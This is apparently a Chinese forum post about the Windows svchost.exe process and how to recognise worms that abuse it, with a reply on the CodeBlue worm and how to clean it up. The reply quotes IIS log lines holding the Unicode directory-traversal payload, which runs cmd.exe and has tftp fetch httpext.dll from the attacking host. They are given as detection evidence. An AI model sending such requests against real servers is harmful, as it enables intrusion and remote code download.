作者:佚名  估计大家也对这个进程奇怪过,那就仔细来看看吧
---------------------------------------------------------------------------------

      Svchost.exe是NT核心系统的非常重要的进程，对于2000、XP来说，不可或缺。很多病毒、木马也会调用它。所以，深入了解这个程序，是玩电脑的必修课之一。

　　大家对Windows操作系统一定不陌生，但你是否注意到系统中“Svchost.exe”这个文件呢？细心的朋友会发现Windows中存在多个 “Svchost”进程（通过“ctrl+alt+del”键打开任务管理器，这里的“进程”标签中就可看到了），为什么会这样呢？下面就来揭开它神秘的面纱。

　　在基于NT内核的Windows操作系统家族中，不同版本的Windows系统，存在不同数量的“Svchost”进程，用户使用“任务管理器”可查看其进程数目。一般来说，Win 2000有两个Svchost进程，Win XP中则有四个或四个以上的Svchost进程（以后看到系统中有多个这种进程，千万别立即判定系统有病毒了哟），而Win 2003 server中则更多。这些Svchost进程提供很多系统服务，如：rpCSS服务（remote procedure call）、dmserver服务（logical disk manager）、dhcp服务（dhcp clieNT）等。

　　如果要了解每个Svchost进程到底提供了多少系统服务，可以在Win 2000的命令提示符窗口中输入“tlist -s”命令来查看，该命令是Win 2000 support tools提供的。在Win XP则使用“tasklist /svc”命令。

　　Svchost中可以包含多个服务.

　　Windows系统进程分为独立进程和共享进程两种，“Svchost.exe”文件存在于“%systemroot% system32”目录下，它属于共享进程。随着Windows系统服务不断增多，为了节省系统资源，微软把很多服务做成共享方式，交由 Svchost.exe进程来启动。但Svchost进程只作为服务宿主，并不能实现任何服务功能，即它只能提供条件让其他服务在这里被启动，而它自己却不能给用户提供任何服务。那这些服务是如何实现的呢？

　　原来这些系统服务是以动态链接库（dll）形式实现的，它们把可执行程序指向 Svchost，由Svchost调用相应服务的动态链接库来启动服务。那Svchost又怎么知道某个系统服务该调用哪个动态链接库呢？这是通过系统服务在注册表中设置的参数来实现。

　　从启动参数中可见服务是靠Svchost来启动的。

　　因为Svchost进程启动各种服务，所以病毒、木马也想尽办法来利用它，企图利用它的特性来迷惑用户，达到感染、入侵、破坏的目的（如冲击波变种病毒“w32.welchia.worm”）。但Windows系统存在多个Svchost进程是很正常的，在受感染的机器中到底哪个是病毒进程呢？这里仅举一例来说明。

　　假设Windows XP系统被“w32.welchia.worm”感染了。正常的Svchost文件存在于“c:\Windows\system32”目录下，如果发现该文件出现在其他目录下就要小心了。“w32.welchia.worm”病毒存在于“c:\Windows\system32Win s”目录中，因此使用进程管理器查看Svchost进程的执行文件路径就很容易发现系统是否感染了病毒。Windows系统自带的任务管理器不能够查看进程的路径，可以使用第三方进程管理软件，如“Windows优化大师”进程管理器，通过这些工具就可很容易地查看到所有的Svchost进程的执行文件路径，一旦发现其执行路径为不平常的位置就应该马上进行检测和处理。

哦，了解

今天上午机器的CPU总是被占用100%，看看进程里面发现了很多Svchost.exe，我的机器是2003server的，然后去网上查查Svchost.exe是个什么东东！楼主在上面介绍过了，下面补充个和Svchost.exe有关系的！
CodeBlue(蓝色代码)蠕虫病毒介绍

该病毒是一种类似于“红色代码II”的新型网络病毒。它利用IIS服务的UNICODE漏洞，通过TCP 80端口进行传播，并可造成计算机网络瘫痪。“蓝色代码”病毒的基本特性如下：

一、攻击的目标系统：

　安装IIS 5.0的Windows 2000系统

二、如何判定遭受“蓝色代码”病毒攻击

1、 在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否含有以下内容：

#Software: Microsoft Internet Information Services 5.0

#Version: 1.0

#Date: 2001-09-06 00:23:47

#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)

2001-09-06 00:23:47 192.168.0.231 - 192.168.0.79 80 HEAD /iisstart.asp - 200 -

2001-09-06 00:23:47 192.168.0.231 - 192.168.0.79 80 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir 200 -

2001-09-06 00:23:49 192.168.0.231 - 192.168.0.79 80 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+tftp+-i+192.168.0.231+get+httpext.dll 502 -

2001-09-06 00:23:51 192.168.0.231 - 192.168.0.79 80 GET /scripts/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+copy+httpext.dll+c:\ 502 -

2001-09-06 00:23:51 192.168.0.231 - 192.168.0.79 80 GET /scripts/httpext.dll - 200

　　如果有以上内容，可以确认已经遭受了“蓝色代码”病毒的攻击，并可从记录中查到攻击方的IP地址。

２、如果注册表含有以下键值，表明系统已遭受感染。　　　  

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\Domain Manager=c:\svchost.exe

３、如果系统中存在以下文件，说明系统已被感染。

　C:\svchost.exe

　C:\httpext.dll

　　且这两个文件的属性是系统、隐含的。

４、按Ctrl+Alt+Del，进入系统任务管理器，在进程中如果发现大量的svchost.exe进程，则表明系统已经遭受感染。

三、解决方案

１、请到以下站点下载补丁程序：

ftp://ftp.seu.edu.cn/Pub/System/ ... _W2k_SP3_x86_cn.exe

http://www.microsoft.com/Windows ... 293826/download.asp

２、断掉网络重新启动系统，防止病毒通过网络再次感染。

３、安装微软补丁程序。

４、删除病毒释放的程序

　　SVCHOST.EXE

　　HTTPEXT.DLL

５、将以下键值svchost.exe删掉

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\Domain Manager=c:\svchost.exe